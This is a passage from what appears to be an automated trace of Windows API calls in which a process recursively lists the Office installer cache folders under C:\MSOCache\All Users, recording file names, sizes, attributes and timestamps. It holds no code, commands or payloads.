dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0183.582] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.582] lstrlenW (lpString="ExcelLR.cab") returned 11 [0183.614] FindClose (in: hFindFile=0x6d5aa8 | out: hFindFile=0x6d5aa8) returned 1 [0183.614] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb570 | out: hHeap=0x6b0000) returned 1 [0183.614] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0183.621] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.622] lstrlenW (lpString="{90140000-0018-0409-1000-0000000FF1CE}-C") returned 40 [0183.622] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6eb778 | out: lpFindFileData=0x6eb778*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d5aa8 [0183.639] FindNextFileW (in: hFindFile=0x6d5aa8, lpFindFileData=0x6eb778 | out: lpFindFileData=0x6eb778*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.639] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.639] FindNextFileW (in: hFindFile=0x6d5aa8, lpFindFileData=0x6eb778 | out: lpFindFileData=0x6eb778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0183.639] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.640] lstrlenW (lpString="PowerPointMUI.msi") returned 17 [0183.648] FindClose (hFindFile=0x6d5aa8) [0183.648] FindClose (in: hFindFile=0x6d5aa8 | out: hFindFile=0x6d5aa8) returned 1 [0183.648] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb778 | out: hHeap=0x6b0000) returned 1 [0183.648] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0183.668] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.668] lstrlenW (lpString="{90140000-0019-0409-1000-0000000FF1CE}-C") returned 40 [0183.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6ecc98 | out: lpFindFileData=0x6ecc98*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b626e59, dwReserved1=0x6877347a, cFileName=".", cAlternateFileName="")) returned 0x6d5aa8 [0183.703] FindNextFileW (in: hFindFile=0x6d5aa8, lpFindFileData=0x6ecc98 | out: lpFindFileData=0x6ecc98*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b626e59, dwReserved1=0x6877347a, cFileName="..", cAlternateFileName="")) returned 1 [0183.703] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.703] FindNextFileW (in: hFindFile=0x6d5aa8, lpFindFileData=0x6ecc98 | out: lpFindFileData=0x6ecc98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0x6b626e59, dwReserved1=0x6877347a, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0183.703] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.703] lstrlenW (lpString="PublisherMUI.msi") returned 16 [0183.709] FindClose (in: hFindFile=0x6d5aa8 | out: hFindFile=0x6d5aa8) returned 1 [0183.710] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecc98 | out: hHeap=0x6b0000) returned 1 [0183.710] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0183.710] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.710] lstrlenW (lpString="{90140000-001A-0409-1000-0000000FF1CE}-C") returned 40 [0183.710] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName=".", cAlternateFileName="")) returned 0x6edfa8 [0183.713] FindNextFileW (in: hFindFile=0x6edfa8, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="..", cAlternateFileName="")) returned 1 [0183.713] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.713] FindNextFileW (in: hFindFile=0x6edfa8, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0183.713] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.713] lstrlenW (lpString="OutlkLR.cab") returned 11 [0183.713] FindClose (in: hFindFile=0x6edfa8 | out: hFindFile=0x6edfa8) returned 1 [0183.714] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb828 | out: hHeap=0x6b0000) returned 1 [0183.714] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0183.714] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.715] lstrlenW (lpString="{90140000-001B-0409-1000-0000000FF1CE}-C") returned 40 [0183.715] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName=".", cAlternateFileName="")) returned 0x6edfa8 [0183.716] FindNextFileW (in: hFindFile=0x6edfa8, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="..", cAlternateFileName="")) returned 1 [0183.716] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.716] FindNextFileW (in: hFindFile=0x6edfa8, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0183.716] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.716] lstrlenW (lpString="Setup.xml") returned 9 [0183.716] FindClose (in: hFindFile=0x6edfa8 | out: hFindFile=0x6edfa8) returned 1 [0183.721] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb828 | out: hHeap=0x6b0000) returned 1 [0183.721] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0183.721] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.721] lstrlenW (lpString="{90140000-002C-0409-1000-0000000FF1CE}-C") returned 40 [0183.722] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName=".", cAlternateFileName="")) returned 0x6edfa8 [0183.724] FindNextFileW (in: hFindFile=0x6edfa8, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="..", cAlternateFileName="")) returned 1 [0183.725] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.725] FindNextFileW (in: hFindFile=0x6edfa8, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0183.725] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.725] lstrlenW (lpString="Proof.en") returned 8 [0183.725] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x6ecf48 | out: lpFindFileData=0x6ecf48*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1cad04a, dwReserved1=0xfc40b730, cFileName=".", cAlternateFileName="")) returned 0x6e9220 [0183.725] FindNextFileW (in: hFindFile=0x6e9220, lpFindFileData=0x6ecf48 | out: lpFindFileData=0x6ecf48*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1cad04a, dwReserved1=0xfc40b730, cFileName="..", cAlternateFileName="")) returned 1 [0183.726] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.726] FindNextFileW (in: hFindFile=0x6e9220, lpFindFileData=0x6ecf48 | out: lpFindFileData=0x6ecf48*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0x1cad04a, dwReserved1=0xfc40b730, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0183.726] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.726] lstrlenW (lpString="Proof.cab") returned 9 [0183.726] FindClose (in: hFindFile=0x6e9220 | out: hFindFile=0x6e9220) returned 1 [0183.726] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecf48 | out: hHeap=0x6b0000) returned 1 [0183.726] FindNextFileW (in: hFindFile=0x6edfa8, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0183.726] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.726] lstrlenW (lpString="Proof.es") returned 8 [0183.726] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x6ecf48 | out: lpFindFileData=0x6ecf48*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1cad04a, dwReserved1=0xfc40b730, cFileName=".", cAlternateFileName="")) returned 0x6e9220 [0183.727] FindNextFileW (in: hFindFile=0x6e9220, lpFindFileData=0x6ecf48 | out: lpFindFileData=0x6ecf48*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1cad04a, dwReserved1=0xfc40b730, cFileName="..", cAlternateFileName="")) returned 1 [0183.727] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.727] FindNextFileW (in: hFindFile=0x6e9220, lpFindFileData=0x6ecf48 | out: lpFindFileData=0x6ecf48*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0x1cad04a, dwReserved1=0xfc40b730, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0183.727] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.728] lstrlenW (lpString="Proof.cab") returned 9 [0183.728] FindClose (in: hFindFile=0x6e9220 | out: hFindFile=0x6e9220) returned 1 [0183.728] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecf48 | out: hHeap=0x6b0000) returned 1 [0183.728] FindNextFileW (in: hFindFile=0x6edfa8, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0183.728] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.728] lstrlenW (lpString="Proof.fr") returned 8 [0183.728] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x6ecf48 | out: lpFindFileData=0x6ecf48*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1cad04a, dwReserved1=0xfc40b730, cFileName=".", cAlternateFileName="")) returned 0x6e9220 [0183.728] FindNextFileW (in: hFindFile=0x6e9220, lpFindFileData=0x6ecf48 | out: lpFindFileData=0x6ecf48*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1cad04a, dwReserved1=0xfc40b730, cFileName="..", cAlternateFileName="")) returned 1 [0183.728] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.728] FindNextFileW (in: hFindFile=0x6e9220, lpFindFileData=0x6ecf48 | out: lpFindFileData=0x6ecf48*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0x1cad04a, dwReserved1=0xfc40b730, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0183.729] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.729] lstrlenW (lpString="Proof.cab") returned 9 [0183.729] FindClose (in: hFindFile=0x6e9220 | out: hFindFile=0x6e9220) returned 1 [0183.729] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecf48 | out: hHeap=0x6b0000) returned 1 [0183.729] FindNextFileW (in: hFindFile=0x6edfa8, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0183.729] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.729] lstrlenW (lpString="Proofing.msi") returned 12 [0183.729] FindClose (in: hFindFile=0x6edfa8 | out: hFindFile=0x6edfa8) returned 1 [0183.729] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb828 | out: hHeap=0x6b0000) returned 1 [0183.729] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0183.729] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.729] lstrlenW (lpString="{90140000-0043-0409-1000-0000000FF1CE}-C") returned 40 [0183.729] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName=".", cAlternateFileName="")) returned 0x6e9220 [0183.733] FindNextFileW (in: hFindFile=0x6e9220, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe4b799c, dwReserved1=0xa7f900ab, cFileName="..", cAlternateFileName="")) returned 1 [0183.733] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.733] FindNextFileW (in: hFindFile=0x6e9220, lpFindFileData=0x6eb828 | out: lpFindFileData=0x6eb828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, 